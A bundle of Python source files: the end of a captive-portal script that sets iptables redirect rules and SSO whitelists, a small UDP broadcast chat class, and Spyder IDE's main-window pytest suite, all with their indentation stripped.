callCmd(["iptables", "-A", "FORWARD", "-i", INTERFACE_INPUT, "-p", "tcp", "--dport", "53", "-j" , "ACCEPT"])
callCmd(["iptables", "-A", "FORWARD", "-i", INTERFACE_INPUT, "-p", "udp", "--dport", "53", "-j" , "ACCEPT"])
# Allow traffic to captive portal
callCmd(["iptables", "-A", "FORWARD", "-i", INTERFACE_INPUT, "-p", "tcp", "-d", LOCAL_SERVER_IP, "--dport", str( HTTP_SERVER_PORT), "-j", "ACCEPT"])
callCmd(["iptables", "-A", "FORWARD", "-i", INTERFACE_INPUT, "-p", "tcp", "-d", LOCAL_SERVER_IP, "--dport", str(HTTPS_SERVER_PORT), "-j", "ACCEPT"])
# Block all other traffic
callCmd(["iptables", "-A", "FORWARD", "-i", INTERFACE_INPUT, "-j" , "DROP"])
# Redirecting HTTPS traffic to captive portal (traffic towards the domain)
callCmd(["iptables", "-t", "nat", "-A", "PREROUTING", "-i", INTERFACE_INPUT, "-p", "tcp", "-d", REMOTE_SERVER_IP, "--dport", str(HTTPS_SERVER_PORT), "-j", "DNAT", "--to-destination", LOCAL_SERVER_IP + ":" + str(HTTPS_SERVER_PORT)])
callCmd(["iptables", "-t", "nat", "-A", "POSTROUTING" , "-p", "tcp", "-d", LOCAL_SERVER_IP, "--dport", str(HTTPS_SERVER_PORT), "-j", "SNAT", "--to-source", REMOTE_SERVER_IP])
# Redirecting HTTP traffic to captive portal (all HTTP traffic)
callCmd(["iptables", "-t", "nat", "-A", "PREROUTING", "-i", INTERFACE_INPUT, "-p", "tcp", "--dport", str( HTTP_SERVER_PORT), "-j", "DNAT", "--to-destination", LOCAL_SERVER_IP + ":" + str( HTTP_SERVER_PORT)])
# Forward DNS traffic to local DNS
if USE_CUSTOM_DNS_SERVER:
callCmd(["iptables", "-t", "nat", "-A", "PREROUTING", "-i", INTERFACE_INPUT, "-p", "tcp", "--dport", str(53), "-j", "DNAT", "--to-destination", LOCAL_DNS_SERVER_IP + ":" + str(DNS_SERVER_PORT)])
callCmd(["iptables", "-t", "nat", "-A", "PREROUTING", "-i", INTERFACE_INPUT, "-p", "udp", "--dport", str(53), "-j", "DNAT", "--to-destination", LOCAL_DNS_SERVER_IP + ":" + str(DNS_SERVER_PORT)])
def sso_init():
global SSO_FACEBOOK_EXCLUDE_DOMAINS, SSO_FACEBOOK_EXCLUDE_IPS, SSO_GOOGLE_EXCLUDE_DOMAINS, SSO_GOOGLE_EXCLUDE_DOMAINS_COUNTRIES,SSO_GOOGLE_EXCLUDE_IPS
# Turn facebook domains to server IPs
if SSO_FACEBOOK:
msgLog("SSO", "Loading Facebook IPs ...")
for domain in SSO_FACEBOOK_EXCLUDE_DOMAINS:
try:
ip = socket.gethostbyname(domain)
except socket.gaierror:
ip = None
if ip != None:
if not (ip in SSO_FACEBOOK_EXCLUDE_IPS):
SSO_FACEBOOK_EXCLUDE_IPS.append(ip)
msgLog("SSO", "Found " + str(len(SSO_FACEBOOK_EXCLUDE_IPS)) + " Facebook IPs")
# Turn google domains to server IPs
if SSO_GOOGLE:
msgLog("SSO", "Loading Google IPs ...")
for domain in SSO_GOOGLE_EXCLUDE_DOMAINS:
try:
ip = socket.gethostbyname(domain)
except socket.gaierror:
ip = None
if ip != None:
if not (ip in SSO_GOOGLE_EXCLUDE_IPS):
SSO_GOOGLE_EXCLUDE_IPS.append(ip)
for toplevel in SSO_GOOGLE_EXCLUDE_DOMAINS_COUNTRIES:
try:
ip = socket.gethostbyname('accounts.google' + toplevel)
except socket.gaierror:
ip = None
if ip != None:
if not (ip in SSO_GOOGLE_EXCLUDE_IPS):
SSO_GOOGLE_EXCLUDE_IPS.append(ip)
msgLog("SSO", "Found " + str(len(SSO_GOOGLE_EXCLUDE_IPS)) + " Google IPs")
# Start Monitor Daemon
def start_auth_daemon():
global authDaemon
msgLog("AuthDaemon", "Start Authorizations Daemon")
authDaemon = AuthorizationsDaemon()
auth_daemon_interval()
def auth_daemon_interval():
threading.Timer(AUTHDAEMON_INTERVAL_CHECK, auth_daemon_interval).start()
authDaemon.runChecks()
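# Note (illustrative, not part of the original script): every call to
# threading.Timer() above spawns a new, non-daemon thread, so the process
# keeps running until the last scheduled timer fires.  A single daemon-thread
# loop is a common alternative; a minimal sketch, assuming the same
# AUTHDAEMON_INTERVAL_CHECK and authDaemon globals and an imported time module:
#
#   def example_auth_daemon_loop():
#       while True:
#           authDaemon.runChecks()
#           time.sleep(AUTHDAEMON_INTERVAL_CHECK)
#
#   threading.Thread(target=example_auth_daemon_loop, daemon=True).start()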
def msgLog(stype, message, level = LOG_NORMAL):
if level >= LOG_LEVEL:
print("[%s] %s" % (stype, message))
sys.stdout.flush()
''' Script Start
-----------------------------------'''
if __name__ == '__main__':
# Check if root
if os.getuid() != 0:
msgLog("Portal", "Need to run with root rights")
else:
# Set up database
database_init()
# Set up iptables
iptables_reset()
iptables_init()
# SSO init
sso_init()
# Monitor Daemon
start_auth_daemon()
# Start Server
start_server()
|
udpplus.py
|
from socket import *
from time import ctime, sleep
import random
import threading
class UDPPlus:
def __init__(self, port):
# Global parameter configuration
self.encoding = "utf-8" # character encoding used for messages
self.broadcastPort = port # broadcast port
self.broadcastHost = self.get_addr() # broadcast IP (the local host address returned by get_addr)
# Create the broadcast receiver socket
self.recvSocket = socket(AF_INET, SOCK_DGRAM)
self.recvSocket.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
self.recvSocket.setsockopt(SOL_SOCKET, SO_BROADCAST, 1)
self.recvSocket.bind((self.broadcastHost, self.broadcastPort))
# Create the broadcast sender socket
self.sendSocket = socket(AF_INET, SOCK_DGRAM)
self.sendSocket.setsockopt(SOL_SOCKET, SO_BROADCAST, 1)
# Other state
self.threads = []
# Get the local machine's IP address
def get_addr(self):
# Get the local hostname
hostname = gethostname()
# Resolve the hostname to an IP and return it
return gethostbyname(hostname)
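# Note (illustrative, not part of the original class): gethostbyname(gethostname())
# can resolve to 127.0.0.1 on hosts whose hostname maps to loopback in /etc/hosts.
# A common alternative is the "UDP connect" trick, sketched here for reference only:
#
#   def example_get_addr():
#       s = socket(AF_INET, SOCK_DGRAM)
#       try:
#           s.connect(("8.8.8.8", 80))  # connect() on a UDP socket sends no packets
#           return s.getsockname()[0]
#       finally:
#           s.close()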
def send(self):
"""发送广播"""
print("调度节点通信广播器启动成功...")
# self.sendSocket.sendto("".encode(self.encoding), (self.broadcastHost, self.broadcastPort))
while True:
sendData = input("Enter the message to send: ")
self.sendSocket.sendto(sendData.encode(self.encoding), (self.broadcastHost, self.broadcastPort))
# self.sendSocket.sendto(sendData.encode(self.encoding), ('255.255.255.255', self.broadcastPort))
# print("【%s】%s:%s" % (ctime(), "我", sendData))
sleep(1)
def recv(self):
"""接收广播"""
print("调度节点通信接收器启动成功...")
while True:
# Received data format: (data, (ip, port))
recvData = self.recvSocket.recvfrom(1024)
print("【%s】[%s : %s] : %s" % (ctime(), recvData[1][0], recvData[1][1], recvData[0].decode(self.encoding)))
sleep(1)
def start(self):
"""启动线程"""
t1 = threading.Thread(target=self.recv)
t2 = threading.Thread(target=self.send)
self.threads.append(t1)
self.threads.append(t2)
for t in self.threads:
t.daemon = True
t.start()
# Keep the main thread alive so the daemon threads keep running
while True:
sleep(1)
def startRecv(self):
t1 = threading.Thread(target=self.recv)
self.threads.append(t1)
for t in self.threads:
t.daemon = True
t.start()
# Keep the main thread alive so the daemon receive thread keeps running
while True:
sleep(1)
def startSend(self):
t2 = threading.Thread(target=self.send)
self.threads.append(t2)
for t in self.threads:
t.daemon = True
t.start()
# Keep the main thread alive so the daemon send thread keeps running
while True:
sleep(1)
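# --- Illustrative usage sketch (not part of the original module) -------------
# Assuming this file is importable as udpplus, exercising the class on an
# arbitrary example port could look like this:
if __name__ == "__main__":
    node = UDPPlus(37020)  # 37020 is a made-up example port
    node.start()           # runs the receive and send loops on daemon threads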
|
test_mainwindow.py
|
# -*- coding: utf-8 -*-
# -----------------------------------------------------------------------------
# Copyright © Spyder Project Contributors
#
# Licensed under the terms of the MIT License
# (see spyder/__init__.py for details)
# -----------------------------------------------------------------------------
"""
Tests for the main window.
"""
# Standard library imports
from distutils.version import LooseVersion
import os
import os.path as osp
import re
import shutil
import tempfile
from textwrap import dedent
try:
from unittest.mock import Mock, MagicMock
except ImportError:
from mock import Mock, MagicMock # Python 2
import sys
import uuid
# Third party imports
from flaky import flaky
from IPython.core import release as ipy_release
from jupyter_client.manager import KernelManager
from matplotlib.testing.compare import compare_images
import nbconvert
import numpy as np
from numpy.testing import assert_array_equal
import pylint
import pytest
from qtpy import PYQT5, PYQT_VERSION
from qtpy.QtCore import Qt, QTimer, QEvent, QPoint, QUrl
from qtpy.QtTest import QTest
from qtpy.QtGui import QImage
from qtpy.QtWidgets import (QAction, QApplication, QFileDialog, QLineEdit,
QTabBar, QToolTip, QWidget)
from qtpy.QtWebEngineWidgets import WEBENGINE
# Local imports
from spyder import __trouble_url__, __project_url__
from spyder.app import start
from spyder.app.mainwindow import MainWindow # Tests fail without this import
from spyder.config.base import get_home_dir, get_module_path
from spyder.config.manager import CONF
from spyder.widgets.dock import TabFilter
from spyder.preferences.runconfig import RunConfiguration
from spyder.plugins.base import PluginWindow
from spyder.plugins.help.widgets import ObjectComboBox
from spyder.plugins.help.tests.test_plugin import check_text
from spyder.plugins.ipythonconsole.utils.kernelspec import SpyderKernelSpec
from spyder.py3compat import PY2, to_text_string
from spyder.utils.programs import is_module_installed
from spyder.widgets.dock import DockTitleBar
from spyder.utils.misc import remove_backslashes
# For testing various Spyder urls
if not PY2:
from urllib.request import urlopen
from urllib.error import URLError
else:
from urllib2 import urlopen, URLError
# =============================================================================
# ---- Constants
# =============================================================================
# Location of this file
LOCATION = osp.realpath(osp.join(os.getcwd(), osp.dirname(__file__)))
# Time to wait until the IPython console is ready to receive input
# (in milliseconds)
SHELL_TIMEOUT = 40000 if os.name == 'nt' else 20000
# A longer timeout is needed because the ".pyx" file has to be cythonized and
# C-compiled before it can be imported and evaluated
COMPILE_AND_EVAL_TIMEOUT = 30000
# Time to wait for the IPython console to evaluate something (in
# milliseconds)
EVAL_TIMEOUT = 3000
# =============================================================================
# ---- Utility functions
# =============================================================================
def open_file_in_editor(main_window, fname, directory=None):
"""Open a file using the Editor and its open file dialog"""
top_level_widgets = QApplication.topLevelWidgets()
for w in top_level_widgets:
if isinstance(w, QFileDialog):
if directory is not None:
w.setDirectory(directory)
input_field = w.findChildren(QLineEdit)[0]
input_field.setText(fname)
QTest.keyClick(w, Qt.Key_Enter)
def get_thirdparty_plugin(main_window, plugin_title):
"""Get a reference to the thirdparty plugin with the title given."""
for plugin in main_window.thirdparty_plugins:
try:
# New API
if plugin.get_name() == plugin_title:
return plugin
except AttributeError:
# Old API
if plugin.get_plugin_title() == plugin_title:
return plugin
def reset_run_code(qtbot, shell, code_editor, nsb):
"""Reset state after a run code test"""
qtbot.waitUntil(lambda: not shell._executing)
with qtbot.waitSignal(shell.executed):
shell.execute('%reset -f')
qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() == 0, timeout=EVAL_TIMEOUT)
code_editor.setFocus()
qtbot.keyClick(code_editor, Qt.Key_Home, modifier=Qt.ControlModifier)
def start_new_kernel(startup_timeout=60, kernel_name='python', spykernel=False,
**kwargs):
"""Start a new kernel, and return its Manager and Client"""
km = KernelManager(kernel_name=kernel_name)
if spykernel:
km._kernel_spec = SpyderKernelSpec()
km.start_kernel(**kwargs)
kc = km.client()
kc.start_channels()
try:
kc.wait_for_ready(timeout=startup_timeout)
except RuntimeError:
kc.stop_channels()
km.shutdown_kernel()
raise
return km, kc
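# Illustrative usage note (not part of the original tests): callers pair this
# helper with explicit teardown, as test_connection_to_external_kernel below
# does, e.g.
#
#   km, kc = start_new_kernel(spykernel=True)
#   ...
#   kc.stop_channels()
#   km.shutdown_kernel(now=True)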
def find_desired_tab_in_window(tab_name, window):
all_tabbars = window.findChildren(QTabBar)
for current_tabbar in all_tabbars:
for tab_index in range(current_tabbar.count()):
if current_tabbar.tabText(tab_index) == str(tab_name):
return current_tabbar, tab_index
return None, None
# =============================================================================
# ---- Fixtures
# =============================================================================
@pytest.fixture
def main_window(request):
"""Main Window fixture"""
# Tests assume inline backend
CONF.set('ipython_console', 'pylab/backend', 0)
# Tests assume the plots are rendered in the console as png
CONF.set('plots', 'mute_inline_plotting', False)
CONF.set('ipython_console', 'pylab/inline/figure_format', 0)
# Check if we need to use introspection in a given test
# (it's faster and less memory consuming not to use it!)
use_introspection = request.node.get_closest_marker('use_introspection')
if use_introspection:
os.environ['SPY_TEST_USE_INTROSPECTION'] = 'True'
else:
try:
os.environ.pop('SPY_TEST_USE_INTROSPECTION')
except KeyError:
pass
# Only use single_instance mode for tests that require it
single_instance = request.node.get_closest_marker('single_instance')
if single_instance:
CONF.set('main', 'single_instance', True)
else:
CONF.set('main', 'single_instance', False)
# Get config values passed in parametrize and apply them
try:
param = request.param
if isinstance(param, dict) and 'spy_config' in param:
CONF.set(*param['spy_config'])
except AttributeError:
pass
if not hasattr(main_window, 'window'):
# Start the window
window = start.main()
main_window.window = window
else:
window = main_window.window
# Close everything we can think of
window.editor.close_file()
window.projects.close_project()
if window.console.error_dialog:
window.console.close_error_dialog()
window.switcher.close()
for client in window.ipyconsole.get_clients():
window.ipyconsole.close_client(client=client, force=True)
# Reset cwd
window.explorer.chdir(get_home_dir())
yield window
# Print shell content if failed
if request.node.rep_setup.passed:
if request.node.rep_call.failed:
# Print content of shellwidget and close window
print(window.ipyconsole.get_current_shellwidget(
)._control.toPlainText())
# Print the info page content if it's not blank
console = window.ipyconsole
client = console.get_current_client()
if client.info_page != client.blank_page:
print('info_page')
print(client.info_page)
window.close()
del main_window.window
@pytest.fixture(scope="session", autouse=True)
def cleanup(request):
"""Cleanup a testing directory once we are finished."""
def remove_test_dir():
if hasattr(main_window, 'window'):
main_window.window.close()
request.addfinalizer(remove_test_dir)
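# Note (illustrative, not part of this file): the main_window fixture above
# reads request.node.rep_setup / rep_call, which only exist when a conftest.py
# defines pytest's standard report hook, roughly:
#
#   @pytest.hookimpl(tryfirst=True, hookwrapper=True)
#   def pytest_runtest_makereport(item, call):
#       outcome = yield
#       rep = outcome.get_result()
#       setattr(item, "rep_" + rep.when, rep)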
# =============================================================================
# ---- Tests
# =============================================================================
@flaky(max_runs=3)
@pytest.mark.slow
@pytest.mark.first
@pytest.mark.single_instance
@pytest.mark.skipif((os.environ.get('CI', None) is None or (PY2
and not sys.platform.startswith('linux'))),
reason="It's not meant to be run outside of CIs")
def test_single_instance_and_edit_magic(main_window, qtbot, tmpdir):
"""Test single instance mode and %edit magic."""
editorstack = main_window.editor.get_current_editorstack()
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT)
spy_dir = osp.dirname(get_module_path('spyder'))
lock_code = ("import sys\n"
"sys.path.append(r'{spy_dir_str}')\n"
"from spyder.config.base import get_conf_path\n"
"from spyder.utils.external import lockfile\n"
"lock_file = get_conf_path('spyder.lock')\n"
"lock = lockfile.FilesystemLock(lock_file)\n"
"lock_created = lock.lock()".format(spy_dir_str=spy_dir))
# Test single instance
with qtbot.waitSignal(shell.executed, timeout=2000):
shell.execute(lock_code)
assert not shell.get_value('lock_created')
# Test %edit magic
n_editors = editorstack.get_stack_count()
p = tmpdir.mkdir("foo").join("bar.py")
p.write(lock_code)
with qtbot.waitSignal(shell.executed):
shell.execute('%edit {}'.format(to_text_string(p)))
qtbot.wait(3000)
assert editorstack.get_stack_count() == n_editors + 1
assert editorstack.get_current_editor().toPlainText() == lock_code
main_window.editor.close_file()
@pytest.mark.slow
def test_lock_action(main_window):
"""Test the lock interface action."""
action = main_window.lock_interface_action
plugins = main_window.widgetlist
# By default the interface is locked.
assert main_window.interface_locked
# In this state the title bar is an empty QWidget
for plugin in plugins:
title_bar = plugin.dockwidget.titleBarWidget()
assert not isinstance(title_bar, DockTitleBar)
assert isinstance(title_bar, QWidget)
# Test that our custom title bar is shown when the action
# is triggered.
action.trigger()
for plugin in plugins:
title_bar = plugin.dockwidget.titleBarWidget()
assert isinstance(title_bar, DockTitleBar)
assert not main_window.interface_locked
# Restore default state
action.trigger()
assert main_window.interface_locked
@pytest.mark.slow
@pytest.mark.first
@pytest.mark.skipif(os.name == 'nt' and PY2, reason="Fails on win and py2")
def test_default_plugin_actions(main_window, qtbot):
"""Test the effect of dock, undock, close and toggle view actions."""
# Use a particular plugin
file_explorer = main_window.explorer
# Undock action
file_explorer._undock_action.triggered.emit(True)
qtbot.wait(500)
assert not file_explorer.dockwidget.isVisible()
assert file_explorer._undocked_window is not None
assert isinstance(file_explorer._undocked_window, PluginWindow)
assert file_explorer._undocked_window.centralWidget() == file_explorer
# Dock action
file_explorer._dock_action.triggered.emit(True)
qtbot.wait(500)
assert file_explorer.dockwidget.isVisible()
assert file_explorer._undocked_window is None
# Close action
file_explorer._close_plugin_action.triggered.emit(True)
qtbot.wait(500)
assert not file_explorer.dockwidget.isVisible()
assert not file_explorer._toggle_view_action.isChecked()
# Toggle view action
file_explorer._toggle_view_action.setChecked(True)
assert file_explorer.dockwidget.isVisible()
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.parametrize('main_window', [{'spy_config': ('main', 'opengl', 'software')}], indirect=True)
def test_opengl_implementation(main_window, qtbot):
"""
Test that we are setting the selected OpenGL implementation
"""
assert main_window._test_setting_opengl('software')
# Restore default config value
CONF.set('main', 'opengl', 'automatic')
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(
np.__version__ < '1.14.0' or (os.name == 'nt' and PY2),
reason="This only happens in Numpy 1.14+"
)
@pytest.mark.parametrize('main_window', [{'spy_config': ('variable_explorer', 'minmax', True)}], indirect=True)
def test_filter_numpy_warning(main_window, qtbot):
"""
Test that we filter a warning shown when an array contains nan
values and the Variable Explorer option 'Show arrays min/max'
is on.
For spyder-ide/spyder#7063.
"""
shell = main_window.ipyconsole.get_current_shellwidget()
control = shell._control
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# Create an array with a nan value
with qtbot.waitSignal(shell.executed):
shell.execute('import numpy as np; A=np.full(16, np.nan)')
qtbot.wait(1000)
# Assert that no warnings are shown in the console
assert "warning" not in control.toPlainText()
assert "Warning" not in control.toPlainText()
# Restore default config value
CONF.set('variable_explorer', 'minmax', False)
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(PY2 or not sys.platform == 'darwin',
reason="Times out in PY2 and fails on other than macOS")
def test_get_help_combo(main_window, qtbot):
"""
Test that Help can display docstrings for names typed in its combobox.
"""
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
help_plugin = main_window.help
webview = help_plugin.get_widget().rich_text.webview._webview
if WEBENGINE:
webpage = webview.page()
else:
webpage = webview.page().mainFrame()
# --- From the console ---
# Write some object in the console
with qtbot.waitSignal(shell.executed):
shell.execute('import numpy as np')
# Get help - numpy
object_combo = help_plugin.get_widget().object_combo
object_combo.setFocus()
qtbot.keyClicks(object_combo, 'numpy', delay=100)
# Check that an expected text is part of the page
qtbot.waitUntil(lambda: check_text(webpage, "NumPy"), timeout=6000)
# Get help - numpy.arange
qtbot.keyClicks(object_combo, '.arange', delay=100)
# Check that an expected text is part of the page
qtbot.waitUntil(lambda: check_text(webpage, "arange"), timeout=6000)
# Get help - np
# Clear combo
object_combo.set_current_text('')
qtbot.keyClicks(object_combo, 'np', delay=100)
# Check that an expected text is part of the page
qtbot.waitUntil(lambda: check_text(webpage, "NumPy"), timeout=6000)
# Get help - np.arange
qtbot.keyClicks(object_combo, '.arange', delay=100)
# Check that an expected text is part of the page
qtbot.waitUntil(lambda: check_text(webpage, "arange"), timeout=6000)
@pytest.mark.slow
@pytest.mark.skipif(PY2, reason="Invalid definition of function in Python 2.")
def test_get_help_ipython_console_dot_notation(main_window, qtbot, tmpdir):
"""
Test that Help works when called from the IPython console
with dot calls, i.e. np.sin.
See spyder-ide/spyder#11821
"""
shell = main_window.ipyconsole.get_current_shellwidget()
control = shell._control
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# Open test file
test_file = osp.join(LOCATION, 'script_unicode.py')
main_window.editor.load(test_file)
code_editor = main_window.editor.get_focus_widget()
# Run test file
qtbot.keyClick(code_editor, Qt.Key_F5)
qtbot.wait(500)
help_plugin = main_window.help
webview = help_plugin.get_widget().rich_text.webview._webview
webpage = webview.page() if WEBENGINE else webview.page().mainFrame()
# Write function name
qtbot.keyClicks(control, u'np.linalg.norm')
# Get help
control.inspect_current_object()
# Check that an expected text is part of the page
qtbot.waitUntil(
lambda: check_text(webpage, "Matrix or vector norm."),
timeout=6000)
@pytest.mark.slow
@pytest.mark.skipif(PY2, reason="Invalid definition of function in Python 2.")
def test_get_help_ipython_console_special_characters(
main_window, qtbot, tmpdir):
"""
Test that Help works when called from the IPython console
for unusual characters.
See spyder-ide/spyder#7699
"""
shell = main_window.ipyconsole.get_current_shellwidget()
control = shell._control
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# Open test file
test_file = osp.join(LOCATION, 'script_unicode.py')
main_window.editor.load(test_file)
code_editor = main_window.editor.get_focus_widget()
# Run test file
qtbot.keyClick(code_editor, Qt.Key_F5)
qtbot.wait(500)
help_plugin = main_window.help
webview = help_plugin.get_widget().rich_text.webview._webview
webpage = webview.page() if WEBENGINE else webview.page().mainFrame()
# Write function name and assert in Console
def check_control(control, value):
return value in control.toPlainText()
qtbot.keyClicks(control, u'aa\t')
qtbot.waitUntil(lambda: check_control(control, u'aaʹbb'), timeout=2000)
# Get help
control.inspect_current_object()
# Check that an expected text is part of the page
qtbot.waitUntil(lambda: check_text(webpage, "This function docstring."),
timeout=6000)
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(os.name == 'nt' and os.environ.get('CI') is not None,
reason="Times out on AppVeyor")
def test_get_help_ipython_console(main_window, qtbot):
"""Test that Help works when called from the IPython console."""
shell = main_window.ipyconsole.get_current_shellwidget()
control = shell._control
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
help_plugin = main_window.help
webview = help_plugin.get_widget().rich_text.webview._webview
webpage = webview.page() if WEBENGINE else webview.page().mainFrame()
# Write some object in the console
qtbot.keyClicks(control, 'runfile')
# Get help
control.inspect_current_object()
# Check that an expected text is part of the page
qtbot.waitUntil(lambda: check_text(webpage, "namespace"), timeout=6000)
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(sys.platform == 'darwin',
reason="Does not work on Mac!")
@pytest.mark.use_introspection
@pytest.mark.parametrize(
"object_info",
[("range", "range"),
("import matplotlib.pyplot as plt",
"The object-oriented API is recommended for more complex plots.")])
def test_get_help_editor(main_window, qtbot, object_info):
"""Test that Help works when called from the Editor."""
help_plugin = main_window.help
webview = help_plugin.get_widget().rich_text.webview._webview
webpage = webview.page() if WEBENGINE else webview.page().mainFrame()
main_window.editor.new(fname="test.py", text="")
code_editor = main_window.editor.get_focus_widget()
editorstack = main_window.editor.get_current_editorstack()
with qtbot.waitSignal(code_editor.lsp_response_signal, timeout=30000):
code_editor.document_did_open()
# Write some object in the editor
object_name, expected_text = object_info
code_editor.set_text(object_name)
code_editor.move_cursor(len(object_name))
with qtbot.waitSignal(code_editor.lsp_response_signal, timeout=30000):
code_editor.document_did_change()
# Get help
with qtbot.waitSignal(code_editor.sig_display_object_info, timeout=30000):
editorstack.inspect_current_object()
# Check that an expected text is part of the page
qtbot.waitUntil(lambda: check_text(webpage, expected_text), timeout=30000)
@pytest.mark.slow
def test_window_title(main_window, tmpdir):
"""Test window title with non-ascii characters."""
projects = main_window.projects
# Create a project in non-ascii path
path = to_text_string(tmpdir.mkdir(u'測試'))
projects.open_project(path=path)
# Set non-ascii window title
main_window.window_title = u'اختبار'
# Assert window title is computed without errors
# and has the expected strings
main_window.set_window_title()
title = main_window.base_title
assert u'Spyder' in title
assert u'Python' in title
assert u'اختبار' in title
assert u'測試' in title
projects.close_project()
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(os.name == 'nt' or PY2, reason="It fails sometimes")
@pytest.mark.parametrize(
"debugcell", [True, False])
def test_move_to_first_breakpoint(main_window, qtbot, debugcell):
"""Test that we move to the first breakpoint if there's one present."""
# Wait until the window is fully up
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT)
# Main variables
control = shell._control
debug_action = main_window.debug_toolbar_actions[0]
debug_button = main_window.debug_toolbar.widgetForAction(debug_action)
# Clear all breakpoints
main_window.editor.clear_all_breakpoints()
# Load test file
test_file = osp.join(LOCATION, 'script.py')
main_window.editor.load(test_file)
code_editor = main_window.editor.get_focus_widget()
# Set breakpoint
code_editor.debugger.toogle_breakpoint(line_number=10)
qtbot.wait(500)
cursor = code_editor.textCursor()
cursor.setPosition(0)
code_editor.setTextCursor(cursor)
if debugcell:
# Advance 2 cells
for i in range(2):
qtbot.keyClick(code_editor, Qt.Key_Return,
modifier=Qt.ShiftModifier)
qtbot.wait(500)
# Debug the cell
qtbot.keyClick(code_editor, Qt.Key_Return,
modifier=Qt.AltModifier | Qt.ShiftModifier)
try:
qtbot.waitUntil(
lambda: shell._control.toPlainText().split()[-1] == 'ipdb>')
# We need to press continue because we don't yet check whether a
# breakpoint is in the cell
qtbot.keyClick(shell._control, 'c')
qtbot.keyClick(shell._control, Qt.Key_Enter)
qtbot.waitUntil(
lambda: shell._control.toPlainText().split()[-1] == 'ipdb>')
except Exception:
print('Shell content: ', shell._control.toPlainText(), '\n\n')
raise
else:
# Click the debug button
qtbot.mouseClick(debug_button, Qt.LeftButton)
qtbot.wait(1000)
# Verify that we are at the first breakpoint
shell.clear_console()
qtbot.wait(500)
shell.pdb_execute("list")
qtbot.wait(500)
assert "1--> 10 arr = np.array(li)" in control.toPlainText()
# Exit debugging
shell.pdb_execute("exit")
qtbot.wait(500)
# Set breakpoint on first line with code
code_editor.debugger.toogle_breakpoint(line_number=2)
qtbot.wait(500)
# Click the debug button
qtbot.mouseClick(debug_button, Qt.LeftButton)
qtbot.wait(1000)
# Verify that we are still debugging
try:
assert shell.is_waiting_pdb_input()
except Exception:
print('Shell content: ', shell._control.toPlainText(), '\n\n')
raise
# Remove breakpoint and close test file
main_window.editor.clear_all_breakpoints()
main_window.editor.close_file()
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(os.name == 'nt', reason='Fails on windows!')
def test_runconfig_workdir(main_window, qtbot, tmpdir):
"""Test runconfig workdir options."""
CONF.set('run', 'configurations', [])
# ---- Load test file ----
test_file = osp.join(LOCATION, 'script.py')
main_window.editor.load(test_file)
code_editor = main_window.editor.get_focus_widget()
# --- Use cwd for this file ---
rc = RunConfiguration().get()
rc['file_dir'] = False
rc['cw_dir'] = True
config_entry = (test_file, rc)
CONF.set('run', 'configurations', [config_entry])
# --- Run test file ---
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT)
qtbot.keyClick(code_editor, Qt.Key_F5)
qtbot.wait(500)
# --- Assert we're in cwd after execution ---
with qtbot.waitSignal(shell.executed):
shell.execute('import os; current_dir = os.getcwd()')
assert shell.get_value('current_dir') == get_home_dir()
# --- Use fixed execution dir for test file ---
temp_dir = str(tmpdir.mkdir("test_dir"))
rc['file_dir'] = False
rc['cw_dir'] = False
rc['fixed_dir'] = True
rc['dir'] = temp_dir
config_entry = (test_file, rc)
CONF.set('run', 'configurations', [config_entry])
# --- Run test file ---
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT)
qtbot.keyClick(code_editor, Qt.Key_F5)
qtbot.wait(500)
# --- Assert we're in fixed dir after execution ---
with qtbot.waitSignal(shell.executed):
shell.execute('import os; current_dir = os.getcwd()')
assert shell.get_value('current_dir') == temp_dir
# ---- Closing test file and resetting config ----
main_window.editor.close_file()
CONF.set('run', 'configurations', [])
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(os.name == 'nt' or sys.platform == 'darwin',
reason="It's failing there")
def test_dedicated_consoles(main_window, qtbot):
"""Test running code in dedicated consoles."""
# ---- Load test file ----
test_file = osp.join(LOCATION, 'script.py')
main_window.editor.load(test_file)
code_editor = main_window.editor.get_focus_widget()
# --- Set run options for this file ---
rc = RunConfiguration().get()
# A dedicated console is used when these two options are False
rc['current'] = rc['systerm'] = False
config_entry = (test_file, rc)
CONF.set('run', 'configurations', [config_entry])
# --- Run test file and assert that we get a dedicated console ---
qtbot.keyClick(code_editor, Qt.Key_F5)
qtbot.wait(500)
shell = main_window.ipyconsole.get_current_shellwidget()
control = shell._control
qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT)
nsb = main_window.variableexplorer.get_focus_widget()
assert len(main_window.ipyconsole.get_clients()) == 2
assert main_window.ipyconsole.filenames == ['', test_file]
assert main_window.ipyconsole.tabwidget.tabText(1) == 'script.py/A'
qtbot.wait(500)
assert nsb.editor.source_model.rowCount() == 4
# --- Assert only runfile text is present and there's no banner text ---
# See spyder-ide/spyder#5301.
text = control.toPlainText()
assert ('runfile' in text) and not ('Python' in text or 'IPython' in text)
# --- Clean namespace after re-execution ---
with qtbot.waitSignal(shell.executed):
shell.execute('zz = -1')
qtbot.keyClick(code_editor, Qt.Key_F5)
qtbot.wait(500)
assert not shell.is_defined('zz')
